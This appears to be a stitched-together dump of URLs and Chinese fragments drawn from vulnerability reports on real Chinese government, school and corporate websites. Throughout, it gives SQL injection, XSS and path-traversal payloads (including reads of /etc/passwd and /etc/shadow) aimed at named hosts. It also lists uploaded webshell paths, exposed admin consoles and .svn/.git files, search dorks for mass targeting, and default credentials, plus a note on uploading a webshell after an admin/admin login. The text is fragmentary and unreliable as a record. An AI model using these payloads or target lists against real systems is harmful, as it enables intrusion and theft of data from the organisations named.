http://myph.mingyi.com.cn/,直接来到明一国际,办公系统喷绘系统前台,如图所示: http://myph.mingyi.com.cn/tz/Tz_show.aspx?tid=33,测试发现存在注入,如图所示: http://www.docin.com/touch_new/preview_new.do?id=569369801 http://gefco.cae.com.cn:443/ http://www.zhuna.cn/e/b2.php?hid=88952634&rid=88952634&pid=88952634&tm1=2015-3-8&tm2=2015-3-10#47436f33-d5e2-4310-8d4a-9eec17a9e962 http://www.zbws.gov.cn/onews.asp?ID=81135 http://www.zbws.gov.cn/onews.asp?ID=81135 http://www3.ahu.edu.cn/ysxy/ http://www3.ahu.edu.cn/ysxy/list.asp?CategoryID=1 http://m.zol.com.cn:80/topic/mwc/list.php?id=3085 http://youxi.zol.com.cn:80/GameData/index.php?c=Tag&db_id=9&info_id=39740&tag_id=46 http://m.zol.com.cn/article/comment_4911432_1.html?ssid=&j=simple&uid=%3E%22%3E%3CScRiPt%3Ealert%281%29%3C/ScRiPt%3E http://article.zol.com.cn/test/phpinfo.php http://ztalk.zol.com.cn/phpinfo.php http://down.chinaz.com/soft/29472.htm inurl:Careers_yp.asp http://www.gaonengkedi.com/Careers_yp.asp?id=4 http://njqygl.com/Careers_yp.asp?id=1 http://www.sxqykx.com/Careers_yp.asp?id=1 http://www.yxxgjx.com/Careers_yp.asp?id=1 http://www.keyi2009.com.cn/Careers_yp.asp?id=2 http://www.yuanhui.cc/Careers_yp.asp?id=1 http://wapchangzhi.com/Careers_yp.asp?id=1 http://www.lyyehuaqi.com/Careers_yp.asp?id=9 http://www.bjxhly.com/Careers_yp.asp?id=12 http://www.tairongdanbao.com/Careers_yp.asp?id=2 http://av.caep.ac.cn//login.php http://av.caep.ac.cn/client_manage\clear\max.php http://spider2.enorth.com.cn:8000/order/admin_user_order/admin_channel_order_match/order_match.do?action=list&edit_class_id=31 http://spider2.enorth.com.cn:8000/order/admin_user_order/admin_channel_order_match/order_match.do?action=addBegin&edit_class_id=31 http://go.yiqifei.com/admin/ http://www.zqkjxyjob.cn/file_download.php http://www.zqkjxyjob.cn/download_file.php?id=151&file_name=1350866433&file_times=4982&file_truename=%B1%CF%D2%B5%B6%A5%B8%DA%CA%B5%CF%B0%B9%DC%C0%ED%B0%EC%B7%A8%20%202012-2013.doc 
http://www.zqkjxyjob.cn/download_file.php?id=151&file_name=1350866433&file_times=4982&file_truename=index.php http://www.xgkjs.net.cn/webapp/sm_login.asp http://www.goodo.com.cn/ http://www2.goodo-edu.com/Web/goodoweb/216005.htm inurl:/EduPlate/ http://www.qhdsf.gov.cn/data/userfile/%E5%8D%A2%E9%BE%99%E9%95%87/inbox/20110928063350%E5%A4%A9%E5%A4%A7%E6%B5%B7%E5%BE%B7ftp.txt http://flights.ctrip.com http://wooyun.org/bugs/wooyun-2015-096440 http://221.1.104.11:8011/ExtWebModels/LandManage/WaterManage.aspx?id= http://221.2.171.59:8300/ExtWebModels/LandManage/WaterManage.aspx?id= http://demo.inongyou.cn/ExtWebModels/LandManage/WaterManage.aspx?id= http://rctdlz.cn/ExtWebModels/LandManage/WaterManage.aspx?id= http://60.2.214.118:8088/ExtWebModels/LandManage/WaterManage.aspx?id= http://121.17.2.52/ExtWebModels/LandManage/WaterManage.aspx?id= http://61.186.154.210:8088/ExtWebModels/LandManage/WaterManage.aspx?id= http://down.chinaz.com/soft/29477.htm http://pay.pinming.cn/orderdetail.aspx?orderid=72b2b66f-44ae-4ba7-a0fd-23d0c8ec3e25 http://www.jggw.suzhou.gov.cn/BLS/IndexList.aspx?type=QuestionsType_3 http://171.8.66.196/loginAction.action http://171.8.66.196/no.jsp http://www.dysti.gov.cn/webmaste/Default.aspx#122_101 http://www.dyxcb.org/webmaste/web_Login.aspx http://dyws.dongying.gov.cn/webmaste/web_Login.aspx http://jgswj.dongying.gov.cn/webmaste/web_Login.aspx http://www.dyxcb.org/webmaste/web_Login.aspx http://www.dylzx.com/webmaste/web_Login.aspx http://www.dysti.gov.cn/webmaste/info/info_add.aspx?CatalogID=0%E2%80%98 http://222.76.206.187:97/ http://222.76.206.187:97/Uploads/DBT_SHIP/2015_03_07_09_36_56_2322_conn.aspx http://www.sxxzpta.com/admin/Login.asp http://www.sxxzpta.com/bm/admin_login.asp http://www.sxxzpta.com/bm/chax.asp?id= http://www.sxxzpta.com/bm/chengji.asp?id= http://www.sxxzpta.com/bm/chengji.asp?sfz= http://www.sxxzpta.com/bm/chengji.asp?uname= http://www.sxxzpta.com/bm/admin_chklogin.asp?xm= 
http://suggestion.baidu.com/su;/1.bat;?wd=&cb=calc||&sid=1440_2031_1945_1788&t=1362056239875然后它会弹出下载的页面。接着下载打开就直接执行这个了,详情还是要看看参考才行呢 http://www.tyky.com.cn http://www.sztaiji.com/ site:gov.cn http://i.xiaomi.com http://i.xiaomi.com,关闭原来的小米手机的数据通信和WiFi,并插上另外一张电话卡,假设是13343214321 http://i.xiaomi.com上发起手机响铃告警的请求。如果没什么意外,18512345678会收到如下格式的短信: http://ziliao.gaofen.com/docs/view/?area=sz&id=6461 http://www.zmjsjt.com.cn/,存在structs2命令执行漏洞,http://www.zmjsjt.com.cn/viewNewsInfo.action?newsId=1855 jdbc:oracle:thin:@192.168.200.2:1521:zmjwwdb"/ http://szhpfpc.91160.com/ http://szhpfpc.91160.com/index.php?c=account&a=mform&mid=4761121 http://www.simoire.com/jjfa/show.asp?aid=298 http://www.simoire.com/jjfa/show.asp?aid=298 http://www.simoire.com/jjfa/show.asp?aid=298 http://data.flurry.com/aas.do http://cht.citic/trc/www.travel.citic.com/route_detail.jsp http://sdb.ycgky.com:8080/SDBConsole/Login_login.action http://sdb.ycgky.com:8080/SDBConsole/wooyun.txt http://ym.tcl.com/ http://ym.tcl.com/test.php http://entuser.pipi.cn:8080/loadvote.action pipi.cn/act pipi.cn/act_stderr.log www.88488.com 88488.com/www 88488.com/www_stderr.log 88488.com/admin 88488.com/admin_stderr.log 88488.com/tuanadmin 88488.com/tuanadmin_stderr.log 88488.com/tuan 88488.com/tuanadmin_stderr.log 88488.com/tianqi 88488.com/tianqi_stderr.log pipi.cn/ent/admin pipi.cn/entadmin_tstderr.log pipi.cn/ent/user pipi.cn/entuser_tstderr.log pipi.cn/ent/admin2 pipi.cn/staradmin_tstderr.log pipi.cn/cp pipi.cn/cp_tstderr.log pipi.cn/popadmin pipi.cn/popadmin_tstderr.log pipi.cn/shop_admin2 pipi.cn/shopadmin1 pipi.cn/act2 cn:8080/根目录,请自己删除。 inurl:company.asp?title=运输线路 http://www.hztl56.com/feedback.asp http://tbt-tools.com/feedback.asp http://glennwl.com/feedback.asp http://www.agr2012.com/feedback.asp http://www.impsos.com/feedback.asp http://www.gzkmhr.com/feedback.asp http://cfyzhsky.com/feedback.asp http://www.hejinwl.com/feedback.asp http://www.560310.com/feedback.asp http://xwdhy.com/feedback.asp 
http://service.haier.net:8086/defective_products/business_processing.jsp?foreign_system=aima&dealer_code=50013560 http://service.haier.net:8086/defective_products/business_processing.jsp?foreign_system=aima&dealer_code=50013532 http://service.haier.net:8086/defective_products/business_processing.jsp?foreign_system=aima&dealer_code=50013539 http://service.haier.net:8086/defective_products/business_processing.jsp?foreign_system=aima&dealer_code=50013546 http://service.haier.net:8086/defective_products/business_processing.jsp?foreign_system=aima&dealer_code=50013551 http://service.haier.net:8086/defective_products/business_processing.jsp?foreign_system=aima&dealer_code=50013554 http://service.haier.net:8086/defective_products/business_processing.jsp?foreign_system=aima&dealer_code=50013556 http://service.haier.net:8086/defective_products/business_processing.jsp?foreign_system=aima&dealer_code=50013560 http://service.haier.net:8086/defective_products/business_processing.jsp?foreign_system=aima&dealer_code=50013560 http://service.haier.net:8086/defective_products/business_processing.jsp?foreign_system=aima&dealer_code=50013560 http://116.55.245.125:9200 http://116.55.245.125:9200/_search?pretty http://uestc.ctvc.tv http://uestc.ctvc.tv/listLastUploadAction.do?num=5 http://uestc.ctvc.tv/companyForUploaderAction.do http://huashi.ctvc.tv http://huashi.ctvc.tv/listLastUploadAction.do?num=5 http://uestc.ctvc.tv/ http://zjicm.ctvc.tv/ http://zju.ctvc.tv/ http://zucc.ctvc.tv/ https://licai.lianjia.com/myAccount/messageDetails?sysid=100001&type=1 http://www.pzhdqedu.gov.cn/xx/x04/index.html然后我看了看后台,恩迅时的,迅时的漏洞老掉牙了,这里就不提了,拿到以后看了下密码 http://www.xiao5u.com/Customers.html link:http://wooyun.org/bugs/wooyun-2010-065350。找到某学校网站,进入后台后 https://vpn.szairport.com http://soa.yundasys.com:30088/ydsoa/cas.login?CASLOGOUT=true http://soa.yundasys.com:30088/ydsoa/help_doc/help.html http://wenku.baidu.com/view/eb923e2f4b73f242336c5ff3.html http://124.207.179.212/netrep/ 
http://www.stats.gov.cn/tjsj/tjbz/xzqhdm/201401/t20140116_501070.html http://ys.oxhack.com/iospoc.html https://github.com/BichengLUO/WebGLBrush/blob/7c8888766a620305273c46a4ebaf9a362f59c63d/WebContent/WEB-INF/web.xml http://www.0769net.com/index.html http://www.yy-edu.com.cn/这个 http://www.yy-edu.com.cn/cn_asp/hudon_show.asp?id=78%27&typeid=133 http://www.yy-edu.com.cn/cn_asp/school_show.asp?id=602 http://www.yy-edu.com.cn/cn_asp/news_show.asp?id=770 http://alexa.ip138.com/ http://alexa.ip138.com/post/Get.aspx?Type=2&ParentID=%B8%CA%CB%E0%CA%A1&t=1425803112327 http://222.85.149.104:8070/ http://hd.jstv.com/djcount/counter_images/12/Heads.asp http://hd.jstv.com/djcount/counter_images/12/adminx_login.asp http://www.3454.com/aaa.rar http://www.sxu.edu.cn/yjjg/tykxyjs/ShowMessage.asp?fid=203 www.daj.suzhou.gov.cn http://www.scal.com.cn/invite2011/admin/ http://www.scal.com.cn/invite2011/admin/ http://open.apps.uc.cn/ http://open.apps.uc.cn/userinfo填好自己手机号,一会有用【用来判断回显】 http://open.apps.uc.cn/userinfo http://221.1.104.11:8011/TouchScreen/jianjie/ShowMes.aspx?id= http://221.2.171.59:8300/TouchScreen/jianjie/ShowMes.aspx?id= http://demo.inongyou.cn/TouchScreen/jianjie/ShowMes.aspx?id= http://rctdlz.cn/TouchScreen/jianjie/ShowMes.aspx?id= http://60.2.214.118:8088/TouchScreen/jianjie/ShowMes.aspx?id= http://121.17.2.52/TouchScreen/jianjie/ShowMes.aspx?id= http://61.186.154.210:8088/TouchScreen/jianjie/ShowMes.aspx?id= http://club.lenovo.com.cn/ http://club.lenovo.com.cn/lefen/gift/pub/city_name.php http://**.**.** http://businesstravel.haier.net/ http://intra.ccfsoft.com:8088/code/projects google:COPYRIGHT©2013-2014 inurl:pro.jsp http://www.shenan-sh.com/admin/fxx.jsp?action=list&sidd=1&type=1&sid=1&siddd=2&pid=1 http://www.jinghongyq.com/admin/fxx.jsp?action=list&sidd=1&type=1&sid=1&siddd=2&pid=1 http://www.shenan-sh.com/admin/fxx.jsp?action=list&sidd=1&type=1&sid=1&siddd=2&pid=1 http://www.meiteletld.com/admin/fxx.jsp?action=list&sidd=1&type=1&sid=1&siddd=2&pid=1 
http://www.shbo-xun.com/admin/fxx.jsp?action=list&sidd=1&type=1&sid=1&siddd=2&pid=1 http://www.kschaosheng.com/admin/fxx.jsp?action=list&sidd=1&type=1&sid=1&siddd=2&pid=1 http://www.xiangyihn.com/admin/fxx.jsp?action=list&sidd=1&type=1&sid=1&siddd=2&pid=1 http://www.dgsaiduolisi.com/admin/fxx.jsp?action=list&sidd=1&type=1&sid=1&siddd=2&pid=1 http://www.xinzhinb.com/admin/fxx.jsp?action=list&sidd=1&type=1&sid=1&siddd=2&pid=1 http://www.bjliuyi.com/admin/fxx.jsp?action=list&sidd=1&type=1&sid=1&siddd=2&pid=1 http://www.yarongsh.com/admin/fxx.jsp?action=list&sidd=1&type=1&sid=1&siddd=2&pid=1 http://www.jingkeleici.com/admin/fxx.jsp?action=list&sidd=1&type=1&sid=1&siddd=2&pid=1 http://www.shenan-sh.com/admin/fxx.jsp?action=list&sidd=1&type=1&sid=1&siddd=*&pid=1 http://www.jinghongyq.com/admin/fxx.jsp?action=list&sidd=1&type=1&sid=1&siddd=*&pid=1 http://www.shenan-sh.com/admin/fxx.jsp?action=list&sidd=1&type=1&sid=1&siddd=*&pid=1 http://www.meiteletld.com/admin/fxx.jsp?action=list&sidd=1&type=1&sid=1&siddd=*&pid=1 http://www.shbo-xun.com/admin/fxx.jsp?action=list&sidd=1&type=1&sid=1&siddd=*&pid=1 http://www.kschaosheng.com/admin/fxx.jsp?action=list&sidd=1&type=1&sid=1&siddd=*&pid=1 http://www.xiangyihn.com/admin/fxx.jsp?action=list&sidd=1&type=1&sid=1&siddd=*&pid=1 http://www.dgsaiduolisi.com/admin/fxx.jsp?action=list&sidd=1&type=1&sid=1&siddd=*&pid=1 http://www.xinzhinb.com/admin/fxx.jsp?action=list&sidd=1&type=1&sid=1&siddd=*&pid=1 http://www.bjliuyi.com/admin/fxx.jsp?action=list&sidd=1&type=1&sid=1&siddd=*&pid=1 http://www.yarongsh.com/admin/fxx.jsp?action=list&sidd=1&type=1&sid=1&siddd=*&pid=1 http://www.jingkeleici.com/admin/fxx.jsp?action=list&sidd=1&type=1&sid=1&siddd=*&pid=1 http://www.taishinart.org.tw/chinese/3_event/detail.php?ID=541 www.baichebao.cn http://www.xmgl.org/ http://dzj.daqing.gov.cn/ http://dzj.daqing.gov.cn/plus/mytag_js.php?aid=9090 http://bbs.paojiao.com/?3 https://portal.haier.com/web/questions/questionlist http://118.145.21.211/ 
http://118.145.21.181/ http://wooyun.org/bugs/wooyun-2010-043520 http://m.yiqifei.com/ http://m.yiqifei.com/search.aspx?keyword=1 http://m.yiqifei.com/search.aspx?keyword=1 http://www.fw0598.com/About.Asp?ID=1 http://www.sunnyschoolsx.com/About.asp?ID=1 http://www.fjndgs.com/About.Asp?ID=16 http://www.hys98.com/About.asp?ID=1 http://www.xhflj.cn/About.asp?ID=17 http://www.smygsg.com/About.Asp?ID=5 http://www.sbxdny.com/About.asp?ID=4 http://www.china-hxgs.com/About.asp?ID=1 http://www.sys98.com/About.asp?ID=1 http://211.87.190.13:8888//k4/list.aspx?type=%BB%F9%B4%A1%D1%A7%BF%C6 http://202.198.141.46:8088/k4/list.aspx?type=%BB%F9%B4%A1%D1%A7%BF%C6 http://59.72.151.21:1100/k4/list.aspx?type=%BB%F9%B4%A1%D1%A7%BF%C6 http://58.40.126.65/k4/list.aspx?type=%BB%F9%B4%A1%D1%A7%BF%C6 http://online.nefu.edu.cn/k4/list.aspx?type=%BB%F9%B4%A1%D1%A7%BF%C6 http://219.141.106.225/k4/list.aspx?type=%BB%F9%B4%A1%D1%A7%BF%C6 http://sync.nefu.edu.cn/k4/list.aspx?type=%BB%F9%B4%A1%D1%A7%BF%C6 http://sync.hnadl.cn/k4/list.aspx?type=%BB%F9%B4%A1%D1%A7%BF%C6 http://202.197.127.113/k4/list.aspx?type=%BB%F9%B4%A1%D1%A7%BF%C6 http://210.26.85.211/k4/list.aspx?type=%BB%F9%B4%A1%D1%A7%BF%C6 http://210.40.3.220/k4/list.aspx?type=%BB%F9%B4%A1%D1%A7%BF%C6 http://gxzy.hnadl.cn/k4/list.aspx?type=%BB%F9%B4%A1%D1%A7%BF%C6 http://211.87.190.13:8888/k4/list.aspx?type=%BB%F9%B4%A1%D1%A7%BF%C6 http://d0.xcar.com.cn:80/d0/phpinfo.php http://home.ithaier.com/techdep/login/ http://home.ithaier.com/techdep/training/ http://www.tclbusiness.com http://www.tclbusiness.com/caches/configs/right_inc.php http://www.tclbusiness.com/caches http://love.mendale.com.cn/webmaster/admin.aspx http://love.mendale.com.cn/upload/news/images/2015330330.aspx http://www.fosu.edu.cn/li/gg/part/admin/admin_login.asp http://oa.mendale.com/defaultroot/login.jsp http://portal.9797168.com/。我就随手看了下,结果发现时织梦的,又试了下默认后台,有试了下admin,admin,然后我就进入后台了,通过文件式管理上传了个大马。 http://203.187.160.217:1234/ http://202.102.41.19/uploads/ 
http://222.240.225.84/Login.aspx http://ttschina.com.cn:9001/jmx-console/ http://www.966009.com http://966009.com/CLIENT/newsshow/dotmap.aspx?dot_id=0215 http://58.59.144.169:81/ http://223.203.195.195:8080/common/login/memberlogin.jsp http://221.6.35.202:8089/jmx-console/ http://hb.servyou.com.cn/sug.asp?info_kind=002001 http://ywt.shenzhenair.com/../../../../../../../../../../../../etc/passwd http://zhanzhang.baidu.com http://58.57.35.3:8090/users/UserLogin.aspx http://data.earthquake.cn/data/ http://data.cmc2-cea.8800.org/login/login.jsp?psw=test&user=test http://222.223.116.105:8089/ http://113.200.222.109:8000/ url:http://mail.cr11-5.com.cn,存在sql注入漏洞,注入点http://mail.cr11-5.com.cn/znss.asp?id=1855,丢到明小子里面跑出了后台登录用户名和密码信息 http://mail.cr11-5.com.cn/Database/DataShop.mdb http://mail.cr11-5.com.cn/ylj/query.asp?action=list http://youxi21-wap.stg2.24cp.com/.svn/entries http://youxi2-wap.stg2.24cp.com/.svn/entries http://youxi3-wap.stg2.24cp.com/.svn/entries http://youxi30-wap.stg2.24cp.com/.svn/entries http://202.108.133.207/ http://duoshuo.com/info.php http://119.57.132.11 http://119.57.132.11:88/ http://a.3454.com/sh.php?k=%5C http://club.lenovo.com.cn/ http://club.lenovo.com.cn/idea/club/index.php?m=shop&c=index&f=collect&goods_id=78231246ce8711e381a446631c66a91e http://27.223.70.11/index_dep.asp hhttp://58.246.85.67:8080/ http://59.33.83.146:8081/ inurl:/admin/AdminLogin.aspx http://www.bankingassociationnt.com/网址 http://www.bankingassociationnt.com/admin/adminLogin.aspx后台 http://www.e-future.com.cn/ url:http://118.122.94.106:8080/ztejdwgs/,发现后台采用jboss应用程序。 url:http://118.122.94.106:8080/jmx-console/ http://118.122.94.106:8080/is/ http://118.122.94.106:8080/is/index.jsp http://116.113.82.132:8222/ http://221.214.117.211:7501/ http://www.hbhk.com.cn/tenpay/notify.jsp http://api.airmac au.com.mo/news/vnews_en.asp?id=A00054 http://product.7po.com/ position:absolute;width:100%;height:300%;background-color vertical-align:top 
Bbsurl:http://www.zhaoshang.net/forum-74-9.html http://58.57.21.146:92/View/Login.aspx http://www.101.com.tw/ http://www.han-hsien.com.tw/hhih/news_detail.php?uid=1548 filetype:xlsx http://www.nesteel.cn/cms_wz/login.jsp http://ipi.tongji.edu.cn/?action=newsdt&id=186 http://ipi.tongji.edu.cn/en/?action=teachers&class=1 http://2008.lenovo.com/.git/config http://58.50.29.86:81/login!login.jspx VERSION:1.2.3 http://www.multigold.com.cn/ http://221.6.210.35:8080/ http://www.xss8.net/?c=uAQKz http://sz.91160.com/account/health/type-healthfile.html http://saas.csm.91160.com:9800/csm-saas/healthFiles/index.action?username=13590******&pageSize=10 http://123.57.1.153:8080/homelink/view_initIndexPageForCustomer.action http://www.jztb.gov.cn/on9e.jsp http://www.jztb.gov.cn/cmd54.jsp http://www.bjtel.cn/admin_login.html http://srm.hnair.com:8082 http://down.chinaz.com/soft/26230.htm( http://www.fjtnzx.gov.cn//admin/upfile_flash.asp http://www.sxzzb.cn//admin/upfile_flash.asp http://www.dtafzx.com/dj//admin/upfile_flash.asp http://www.hbzhongshan.net/dj//admin/upfile_flash.asp http://www.fosu.edu.cn/ceie/lsdjgov//admin/upfile_flash.asp http://121.14.161.82:10003/ http://121.14.161.82:10010/ http://121.14.161.82:10010/db?action=show http://115.238.230.18:19101/ http://www.zteup.com http://59.151.17.89/zabbix/ http://zabbix.pica.com http://112.64.143.11:5050/ http://221.202.97.75/websystem.php https://test.bescar.com https://angelic.com.cn/ http://222.223.56.116 https://222.92.15.100 https://test.bescar.com/WebClient/down_file.php?filename=WebClient.exe https://test.bescar.com/WebClient/down_file.php?filename=/etc/shadow http://0745.hhly.gov.cn/admin/login.html http://images.laiyifen.com:80/themes/laiyifen2/images/css/.svn/entries http://images.laiyifen.com:80/themes/laiyifen2/images/js/.svn/entries http://touch.laiyifen.com:80/.svn/entries http://images.laiyifen.com:80/themes/laiyifen2/images/css/.svn/entries http://touch.laiyifen.com:80/media/.svn/entries 
http://wx.laiyifen.com:80/.svn/entries http://wx.laiyifen.com:80/html/pc/images/.svn/entries http://oim.laiyifen.com:80/info.php http://wx.laiyifen.com/info.php http://eip.laiyifen.com/oa/lyf/whln.nsf/myview?openform&count=10&view=vwPubliced%27%27%3E%22%3E%3C/title%3E%3C/textarea%3E%3C/script%3E%3Cscript%3Ealert%28/xss/%29%3C/script%3E http://laiyifen.com/index.php/product-gnotify.html http://weixin.linktech.hk/businessQueryController.do?action=goToteleChargeJsp&mid=13066612345&wxid=16dc648f-c776-4e5f-9fb0-e675caae6abf&sign=d206da41ca2ae3807090319d95da0258&openid=ojJL_jvI54OzhYWz_bnWE1BYVESs http://61.156.3.46/web/ http://121.26.194.190 http://zxxxj.tj.edu.cn/uids/,对admin等进行了登陆次数时间戳限制 http://trust-usexpress.com/showPackages/showPackagesInfo.aspx?trkNos=ZC191513530CA http://wooyun.org/bugs/wooyun-2015-0100246 http://weizhonggou.com/go/shaidan_admin/sh_show http://weizhonggou.com/wzgadmin_msgs# http://wooyun.org/bugs/wooyun-2014-088376 http://58.20.192.237:8181/ http://weizhonggou.com/member/home/useraddress http://1001f.com/Login.action http://tvs.tcl.com/front/login.jsp http://tvs.tcl.com/manager/login.jsp http://www.jit.com.cn/ http://222.160.140.29:8000/zwdtSjgl/Directory/searchTypeDir.jsp?department_id=DE200804031229450156&department_name=市民族事务委员会&department_Type=1&title1code=12&typeDirName=年度政府信息公开工作报告 http://218.62.109.219:8000/zwdtSjgl/Directory/searchTypeDir.jsp?department_id=8a8a8a8a2f328744012f328bd0640033&department_name=安监局%20%20&department_Type=1&title1code=12&typeDirName=年度政府信息公开工作报告 http://61.138.128.150:8080/zwdtSjgl/Directory/searchTypeDir.jsp?department_id=AA297&department_name=吉林市畜牧业管理局&department_Type=1&title1code=12&typeDirName=年度政府信息公开工作报告 http://218.62.90.168/zwdtSjgl/Directory/searchTypeDir.jsp?department_id=402827812c1af4a6012c20443218009c&department_name=图们市广播电视管理局&department_Type=1 http://zwgk.wangqing.gov.cn/zwdtSjgl/Directory/searchTypeDir.jsp?department_id=4aef2fbd2c814021012c8145c6730002&department_name=汪清镇人民政府&department_Type=1 
http://122.140.89.254/zwdtSjgl/Directory/searchTypeDir.jsp?department_id=DE200812231009110359&department_name=市科技局&department_Type=1 http://218.27.147.134/zwdtSjgl/Directory/searchTypeDir.jsp?department_id=AAB653&department_name=永吉县食品药品监督管理局&department_Type=1&title1code=13&typeDirName=年度政府信息公开工作报告 http://www.jlfm.gov.cn:8081/zwdtSjgl/Directory/searchTypeDir.jsp?department_id=AAB182&department_name=丰满区泰山街道办事处&department_Type=1 http://218.62.86.138/zwdtSjgl/Directory/searchTypeDir.jsp?department_id=AAB274&department_name=桦甸市财政局&department_Type=1&title1code=13&typeDirName=年度政府信息公开工作报告 http://58.244.248.90:81/zwdtSjgl/Directory/searchTypeDir.jsp?department_id=4028816f33f8696e0133fd57e33000ca&department_name=双辽市安全生产监督管理局&department_Type=1&title1code=11&typeDirName=年度政府信息公开工作报告 http://218.62.81.171/zwdtSjgl/Directory/searchTypeDir.jsp?department_id=AABB504&department_name=磐石市广播电影电视局&department_Type=1 http://www.ilj.gov.cn/zwdtSjgl/Directory/searchTypeDir.jsp?department_id=5a9b4f952ced360c012cedd29034000c&department_name=龙井市审计局&department_Type=1&title1code=12&typeDirName=年度政府信息公开工作报告 http://m.feiniu.com/register/forget/ https://sapp.feiniu.com/misc/GetCaptcha url:http://www.crmg-lz.com,发现存在一个注入点http://www.crmg-lz.com/struct.asp?classid=2 http://up.wps.kingsoft.com/newupdate/specialpatch/index.ini以下载更新。返回的内容: http://up.wps.kingsoft.com/newupdate/specialpatch/WPS_UpdatePatch_9.1.0.4985.exe http://jy.4000211929.com/ http://pigai.org/) http://117.79.131.110:9200/ http://static.wooyun.org/wooyun/upload/201501/182143298fb266564327c29660ba43d83df33481.png http://218.106.130.40:8080/login.asp?step=login http://booking.hnair.com:8080 system:manager kingdomdeMacBook-Pro:sqlmap http://218.58.70.195/notice/noticeDetail?pk=8797305478977 http://sqlmap.org URL:http://kan.jnnc.com/seek.aspx?classId=5¶me=%E5%8F%B2%E8%92%82%E6%96%87%C2%B7%E5%B8%83%E9%87%8C%E5%B0%94 inurl:index.php?g=Home&m=Index&a=help inurl:login http://121.41.24.243/index.php 
http://www.zs-safety.gov.cn/infoView.aspx?id=5407 http://www.zs-safety.gov.cn/admin/ www.hua.com http://www.lzgd.net/zt/show_ja.php http://yqdz.jlbank.com.cn/chk/forceQuit.do http://112.91.118.57/doc/page/main.asp http://61.145.199.125/webewf/Login/Login.htm http://authcenter.add.sogou-inc.com/admin/authSite.php http://authcenter.add.sogou-inc.com/admin/search.php http://www.wooyun.org http://authcenter.add.sogou-inc.com/login.php http://localhost/bagecms/index.php?r=admini/admin/create http://lib.keyanzx.org/yjlib/index.action http://yb.tccxfw.com/ http://help.u17.com/index.php?list-focus-2 http://help.u17.com/index.php?list-focus-2/**/and/**/1=1 http://help.u17.com/index.php?list-focus-2/**/and/**/1=2 http://help.u17.com/index.php?list-focus-2/**/and/**/1=2/**/union/**/select/**/*/**/from/**/mysql.user/* http://zfb.nyist.edu.cn/msgboard/index.php?current_page=1 http://e.xdf.cn/List-index-code-SAT http://www.heica.gov.cn/search/gongqiu.php?KeyWord=1 http://www.jxlife.com.cn/jxlife/web/index.jsp http://sales.jxlife.com.cn/online/shs/user/resetPwd.jsp?user_name=18781279344 http://sales.jxlife.com.cn/online/shs/user/resetPwd.jsp?user_name=t_anke@163.com&productCode=undefined&un=undefined&pn=undefined http://www.libopac.seu.edu.cn:8080/ http://www.libopac.seu.edu.cn:8080/reader/hwthau2.php http://www.libopac.seu.edu.cn:8080/reader/hwthau2.php?id=213121028 http://www.xmxz.org.cn/contView.php?id=94 http://wsbs.sc-n-tax.gov.cn/login.htm http://shiyuanhui.haier.com/if2/index.shtml http://shiyuanhui.haier.com/If/doGetWorkList/?callback=jQuery19105044096050442379_1425977446886&page=1&limit=10&cate=%E4%BA%A7%E5%93%81%E8%AE%BE%E8%AE%A1&_=1425977446887 http://www.btac.cn/dminfo.php?id=4&type=Drama http://www.ishowchina.com/user/login.html http://www1.nm.zsks.cn/ncrebm/userLogin.jsp http://www1.nm.zsks.cn/ncrebm/admin/index.jsp http://www1.nm.zsks.cn/ncrebm/findpwd.jsp http://bbs.g-bits.com/portal.php http://218.201.210.214/admin.jsp http://www.cec.zju.edu.cn/wescms/index.php 
http://ipe.zju.edu.cn/manage/System_main.asp http://www.gfs.zju.edu.cn/bbs/uc_server http://www.gfs.zju.edu.cn/bbs/0.php http://dqxy.zju.edu.cn/message.php?action=show&id=58%27or%20updatexml%281,concat%280x7e,%28user%28%29%29%29,0%29or%27 http://www.hongdu.com.cn:80/ www.hongdu.com.cn ip:8735,结果什么也打不开。然后想起手机联入这wifi的ip为192.168.191.2,于是在地址栏里输入192.168.191.1:8735,于是熟悉的页面出现了。。。 ip:8735/tool http://211.100.27.51/b2b/ http://pgzy.zjzs.net:8011/login.htm http://123.196.123.15/login.action http://app.91160.com/ http://down.chinaz.com/soft/22411.htm http://www.zsmm.gov.cn/book_write.asp http://www.gzah-translation.cn/newsb//book_write.asp http://www.rcsrsj.com//book_write.asp http://www.sclzzx.com/jxyj//book_write.asp http://www.nwsni.edu.cn/ywx/book_write.asp http://dzb.lszjy.com/book_write.asp http://nercar.ustb.edu.cn/sr/book_write.asp http://www.wjcqxx.com.cn/zt/zp/book_write.asp http://tiandiqj.com/book_write.asp http://www.whits.cn/qyb/book_write.asp http://www.wlyjsj.gov.cn/book_write.asp http://www.51peichang.net/book_write.asp http://www.yonghengmu.cc/book_write.asp http://jky.yctei.cn//book_write.asp http://www.cnzfcj.com//book_write.asp http://ddc.sxgy.cn//book_write.asp http://www.sztyx.com/community//book_write.asp http://www.jxhdj.com//book_write.asp http://jsjx.lmu.cn/jyfwb//book_write.asp http://www.jdtzb.gov.cn//book_write.asp www.da.shu.edu.cn http://www.da.shu.edu.cn/pub/search/default.asp?id=101 http://**.**.**/mdm/admin/ http://**.**.**/ http://223.82.246.237:8080/ivhs/ajax_updateUserInfo.action http://223.82.246.237:8080/ivhs/ajax_updateUserInfo.action jar:/usr/local/tomcat//bin/bootstrap.jar http://www.appstar.com.cn/ http://www.appstar.com.cn/appstar/manage/sysConfig.jsp http://www.siom.ac.cn/admin/tables/tab_member/detailsb.asp?txtMemberNo=2838 http://www.wlepb.gov.cn/adm/index.php http://211.160.72.5:7788/console http://www.360etou.com/hetong/11412772879/a208g.html http://61.158.142.18:9093/PeopleComHnS/login.htm 
http://61.158.142.18:9093/PeopleComHnS//upload/1503102022513390.jsp inurl:gb/company.asp http://www.esmmodel.com http://www.tslingerie.com http://www.hitom-china.com http://www.dkg.com.cn http://www.dg-hy.com.cn http://www.zs-jc.com http://www.hgfrp.com http://www.fl-china.com http://www.dingrunkeji.com.cn http://www.kodaoptical.com http://www.dgsanyo.com http://60.247.77.197/ http://zsjyxy.scnucas.com/system/zyjd/indexDetails.asp?Id=7 http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd http://www.w3.org/1999/xhtml http://www.haodai.com http://www.haodai.com/xiaofei/ http://www.haodai.com/qiye/ http://www.haodai.com/gouche/ http://www.haodai.com/goufang/ http://www.haodai.com/zixun/ http://www.haodai.com/wenda/ http://www.haodai.com http://www.haodai.com/ajax/getpasswd http://www.liangjian.com/e/e.rar http://wljx.hdu.edu.cn/eol/homepage/common/opencourse/index.jsp user:test123 password:123456 user:theol_teacher password:123456 user:theol_student password:123456 https://42.121.125.42/manage/login http://lib.sqnc.edu.cn/shownews.asp?id=851 